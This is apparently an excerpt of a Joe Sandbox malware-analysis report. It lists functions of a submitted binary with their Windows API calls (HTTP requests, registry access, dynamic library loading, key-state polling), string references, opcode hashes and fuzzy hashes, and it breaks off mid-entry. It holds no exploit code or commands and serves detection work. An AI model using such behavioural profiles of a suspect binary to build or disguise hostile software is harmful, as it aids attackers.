API String ID: 1173514356-4108050209
Opcode ID: d683ba01182ea4f9255258aa752a9829f3891ee9b7c2cf3b546c8039bbd4c7a4
Instruction ID: 9c586c5e5ecdf7e1de924040246011cac2c59e187f6c69c9052a452e662532a7
Opcode Fuzzy Hash: d683ba01182ea4f9255258aa752a9829f3891ee9b7c2cf3b546c8039bbd4c7a4
Instruction Fuzzy Hash: C841B0706053419FD720DF24C884B6ABBE8EF95314F04492EF9A597392DB30E905DB62

Function 000ED7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 000ED7C5

Part of subcall function 0007784B: _memmove.LIBCMT ref: 00077899

Strings

winapi, xrefs: 000ED836
stdcall, xrefs: 000ED847
cdecl, xrefs: 000ED81C
none, xrefs: 000ED8A0

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: e8eaa640b4f2319cde50196f5294623e746e8c3ca36158b203149f7c5a3890df
Instruction ID: 23720a63ded54cc0d1445be91b76166bb96f8f2294a9444bcf06584b734ea805
Opcode Fuzzy Hash: e8eaa640b4f2319cde50196f5294623e746e8c3ca36158b203149f7c5a3890df
Instruction Fuzzy Hash: DB31A171904216AFCF00EF59CD519FEB3B5FF04320B10862AE869A76D2DB71AD05CB90

Function 000C8E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00077DE1: _memmove.LIBCMT ref: 00077E22

Part of subcall function 000CAA99: GetClassNameW.USER32(?,?,000000FF), ref: 000CAABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 000C8F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 000C8F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 000C8F57

Part of subcall function 00077BCC: _memmove.LIBCMT ref: 00077C06

Strings

ListBox, xrefs: 000C8ED3
ComboBox, xrefs: 000C8E9E

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: e93b30d5c23f391fddbd618dd179753bf7a7a6a8d2780bc18d3ff3877ec0f3f8
Instruction ID: e6a88a486c9d9d95b8f046dfef4f70909c2b5a41837591de0dc367743821a136
Opcode Fuzzy Hash: e93b30d5c23f391fddbd618dd179753bf7a7a6a8d2780bc18d3ff3877ec0f3f8
Instruction Fuzzy Hash: 7B21D271A04109BEDB14ABB09C45EFFB7A9DF06360B14852DF429971E2DF79480AD624

Function 000E182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000E184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000E1872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 000E18A2
InternetCloseHandle.WININET(00000000), ref: 000E18E9

Part of subcall function 000E2483: GetLastError.KERNEL32(?,?,000E1817,00000000,00000000,00000001), ref: 000E2498
Part of subcall function 000E2483: SetEvent.KERNEL32(?,?,000E1817,00000000,00000000,00000001), ref: 000E24AD

Strings

, xrefs: 000E1893

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: b64e99e7fe5259dbbe677b3ceb2d15483b6932e12a3363390bfd1239c05d68a8
Instruction ID: 370ec9cf83562800587384e1479bdc6627f589617bed8c42676e8daf173677b0
Opcode Fuzzy Hash: b64e99e7fe5259dbbe677b3ceb2d15483b6932e12a3363390bfd1239c05d68a8
Instruction Fuzzy Hash: FE21B0B1504348BFEB219B62DD85EFF77EDEB48744F10412AF405A2280DB749D04A7A1

Function 000F63E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00071D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00071D73
Part of subcall function 00071D35: GetStockObject.GDI32(00000011), ref: 00071D87
Part of subcall function 00071D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00071D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 000F6461
LoadLibraryW.KERNEL32(?), ref: 000F6468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 000F647D
DestroyWindow.USER32(?), ref: 000F6485

Strings

SysAnimate32, xrefs: 000F643C

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: af3296b46c68d04dcef6c9dd01462efcec32ea48edd85cd8831742ba0113c4e3
Instruction ID: 745545bcfff5ae3e66700fe153023160eafd650e804843e0cc5d7a96e9341f1f
Opcode Fuzzy Hash: af3296b46c68d04dcef6c9dd01462efcec32ea48edd85cd8831742ba0113c4e3
Instruction Fuzzy Hash: 70217971200209ABEF106FA4DC80EBB37E9EF59364F104629FA1093991D736AC91A760

Function 000D6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 000D6DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 000D6DEF
GetStdHandle.KERNEL32(0000000C), ref: 000D6E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 000D6E3B

Strings

nul, xrefs: 000D6E36

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 3a5351594e01d186287f9129a71933a7d1a9b60cd1a150ecf4e2e06d4b828b3b
Instruction ID: 7292320813001b85880295cbe6f8a3dbd80574b4bff98ab5879d4c751b03dfd3
Opcode Fuzzy Hash: 3a5351594e01d186287f9129a71933a7d1a9b60cd1a150ecf4e2e06d4b828b3b
Instruction Fuzzy Hash: AB219575A0030AABDB209F29EC04AA977F5EF44720F20461AFCA1D73D0D7729950DB64

Function 000D6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 000D6E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 000D6EBB
GetStdHandle.KERNEL32(000000F6), ref: 000D6ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 000D6F06

Strings

nul, xrefs: 000D6F01

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 0977b7bba0e769477a3f1acf39b06de90b50033c7fb7cc8e7d829484ee6e1466
Instruction ID: 3aea66f35821f89d549da13edaaeb9600f4e1eefad256d48cd81803ccc57afff
Opcode Fuzzy Hash: 0977b7bba0e769477a3f1acf39b06de90b50033c7fb7cc8e7d829484ee6e1466
Instruction Fuzzy Hash: 292180796003069BDB609F69DC44AAA77E8EF55720F200A1BFCA1D73D0DB72A851CB70

Function 000DAC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 000DAC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 000DACA8
__swprintf.LIBCMT ref: 000DACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,000FF910), ref: 000DACFF

Strings

%lu, xrefs: 000DACBB

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: b5dc52cd57d148d2fa9f6c9524fc5769699597c296f221e65142eb23dce7f5d1
Instruction ID: d355706edc98e77d6e0751b96d0487d8da1175e220e9c791ca8893756e32e183
Opcode Fuzzy Hash: b5dc52cd57d148d2fa9f6c9524fc5769699597c296f221e65142eb23dce7f5d1
Instruction Fuzzy Hash: E2217F74A00209AFCB10DF64C985EEE7BB8FF49714B008069F909EB352DB75EA41DB61

Function 000D1142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,000CFCED,?,000D0D40,?,00008000), ref: 000D115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,000CFCED,?,000D0D40,?,00008000), ref: 000D1184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,000CFCED,?,000D0D40,?,00008000), ref: 000D118E
Sleep.KERNEL32(?,?,?,?,?,?,?,000CFCED,?,000D0D40,?,00008000), ref: 000D11C1

Strings

@, xrefs: 000D119D

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID: @
API String ID: 2875609808-1153717794
Opcode ID: 24b811d40cf3302e1a5827c5b2eb70f3eed16fbad07913f7ec6ef264d089c804
Instruction ID: f21a8e2bf831312c30eb86896505caf791cffabf1fcd8b533f617c97d7f52228
Opcode Fuzzy Hash: 24b811d40cf3302e1a5827c5b2eb70f3eed16fbad07913f7ec6ef264d089c804
Instruction Fuzzy Hash: D5114835C00619EBCF009FA4D848AFEBBB8FF09711F014056EA40B2240CA3095A0DBE1

Function 000D1AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 000D1B19

Strings

REMOVE, xrefs: 000D1B1F
EXISTS, xrefs: 000D1B41
KEYS, xrefs: 000D1B30
APPEND, xrefs: 000D1B52

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: a27ac8b7afaf0b3a6e359c720480a4e16d9e51810cd0d050144e819f9dad83bc
Instruction ID: 586a5e0a4fc4ff09ba3dc5fd7367728ee65e6a882a15e3c5b0fa601536c48625
Opcode Fuzzy Hash: a27ac8b7afaf0b3a6e359c720480a4e16d9e51810cd0d050144e819f9dad83bc
Instruction Fuzzy Hash: F5116D319002199FCF40EFA4E9518FEB7B4FF25304B1084AAE814AB792EF325D06DB60

Function 000EEB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 000EEC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 000EEC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 000EED6A
CloseHandle.KERNEL32(?), ref: 000EEDEB

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: e6ba7827ceaad5ca8a1b9887d83740bced072c7fd8c0d583b832a9f1dc7c7e48
Instruction ID: dff76ad1321a07239476d6ea67ebbc2eadf2e612f2186d1fda9cfc173200f77b
Opcode Fuzzy Hash: e6ba7827ceaad5ca8a1b9887d83740bced072c7fd8c0d583b832a9f1dc7c7e48
Instruction Fuzzy Hash: 95817E71A043419FD760EF29CC86F6AB7E5AF44710F04C81DF999AB292DB74AC40CB96

Function 000F0037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00077DE1: _memmove.LIBCMT ref: 00077E22

Part of subcall function 000F0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000EFDAD,?,?), ref: 000F0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000F00FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000F013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 000F0183
RegCloseKey.ADVAPI32(?,?), ref: 000F01AF
RegCloseKey.ADVAPI32(00000000), ref: 000F01BC

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 39f052379560821bcb3123afb0453869fe11e4f058a1d6b95abc173979e73b51
Instruction ID: 2c110b1ead135dda3420a7db8e05a22e68d9018de47d7e0532a02cd3bf4d1729
Opcode Fuzzy Hash: 39f052379560821bcb3123afb0453869fe11e4f058a1d6b95abc173979e73b51
Instruction Fuzzy Hash: 0D514A71608209AFD714EF54C881EBEB7E9FF84314F40892DF699872A2DB35E904DB52

Function 000ED8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00079837: __itow.LIBCMT ref: 00079862
Part of subcall function 00079837: __swprintf.LIBCMT ref: 000798AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 000ED927
GetProcAddress.KERNEL32(00000000,?), ref: 000ED9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 000ED9C6
GetProcAddress.KERNEL32(00000000,?), ref: 000EDA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 000EDA21

Part of subcall function 00075A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,000D7896,?,?,00000000), ref: 00075A2C
Part of subcall function 00075A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,000D7896,?,?,00000000,?,?), ref: 00075A50

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: db5803f7ed9429023289aeafa46a2f0b162e3892f3b9a86599c6e1fdecf2f4cc
Instruction ID: a4fe167f2a80a54e671bf565be90c104ec9347570d49bbeb56321c4e213c5e3c
Opcode Fuzzy Hash: db5803f7ed9429023289aeafa46a2f0b162e3892f3b9a86599c6e1fdecf2f4cc
Instruction Fuzzy Hash: 9D512535A0020ADFCB00EFA8C8849EDB7F4FF09310B04C06AE819AB312D734AE45CB95

Function 000DE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 000DE61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 000DE648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 000DE687

Part of subcall function 00079837: __itow.LIBCMT ref: 00079862
Part of subcall function 00079837: __swprintf.LIBCMT ref: 000798AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 000DE6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 000DE6B4

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 5590524d00e5f6ed956a1661efa4b67f27605e85d655e937f23633ed0c42bb37
Instruction ID: 6661e44f8776f0d0b7f7545ca9dcaf516a0ccf133a1f635c133ae48101156e45
Opcode Fuzzy Hash: 5590524d00e5f6ed956a1661efa4b67f27605e85d655e937f23633ed0c42bb37
Instruction Fuzzy Hash: 71511A35A00205DFCB41EF64C981AAEBBF5EF09314F1480A9E819AB362DB35ED11DF65

Function 000FA056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d8e69511ab2701f372c715320e32b2d9ac5be939820a7b69e718f00790b5715
Instruction ID: 0284064d80451f250aa61aa374416f6bf0b26f26c011b8bcb0179eed0aec1c89
Opcode Fuzzy Hash: 2d8e69511ab2701f372c715320e32b2d9ac5be939820a7b69e718f00790b5715
Instruction Fuzzy Hash: FB41F7B5A04108AFD760DF24DC88FB9BBE4FB0A350F154165FA19A76E1CB30AD41FA51

Function 00072344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00072357
ScreenToClient.USER32(001357B0,?), ref: 00072374
GetAsyncKeyState.USER32(00000001), ref: 00072399
GetAsyncKeyState.USER32(00000002), ref: 000723A7

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: d5e4f4a1d5bb373a002c02eb604a244bbea683aaa17db1b2c16834bb7e16bf1e
Instruction ID: f431da3df1f4ad6a8490b66de4e0f064fe78aa52bb3648878fdd3ab38f282049
Opcode Fuzzy Hash: d5e4f4a1d5bb373a002c02eb604a244bbea683aaa17db1b2c16834bb7e16bf1e
Instruction Fuzzy Hash: AB418375A04109FFDF259F68C844EEDBBB4FB05364F208329F82896291CB359A90DB90

Function 000C63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000C63E7
TranslateAcceleratorW.USER32(?,?,?), ref: 000C6433
TranslateMessage.USER32(?), ref: 000C645C
DispatchMessageW.USER32(?), ref: 000C6466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000C6475

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 85924fc731c5ced59cee2c364de0f86c30082441036e02608f8cd74386fabf2e
Instruction ID: edcc55b59d1d8ed574da575a77f99875df419fc6b0e854b02f9a1f99943978f9
Opcode Fuzzy Hash: 85924fc731c5ced59cee2c364de0f86c30082441036e02608f8cd74386fabf2e
Instruction Fuzzy Hash: F031A031900646EFDBB88FB4DC44FBA7BEDAB01700F54416DE425C25A1EB2A9989DB60

Function 000C8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 000C8A30
PostMessageW.USER32(?,00000201,00000001), ref: 000C8ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 000C8AE2
PostMessageW.USER32(?,00000202,00000000), ref: 000C8AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 000C8AF8

Memory Dump Source

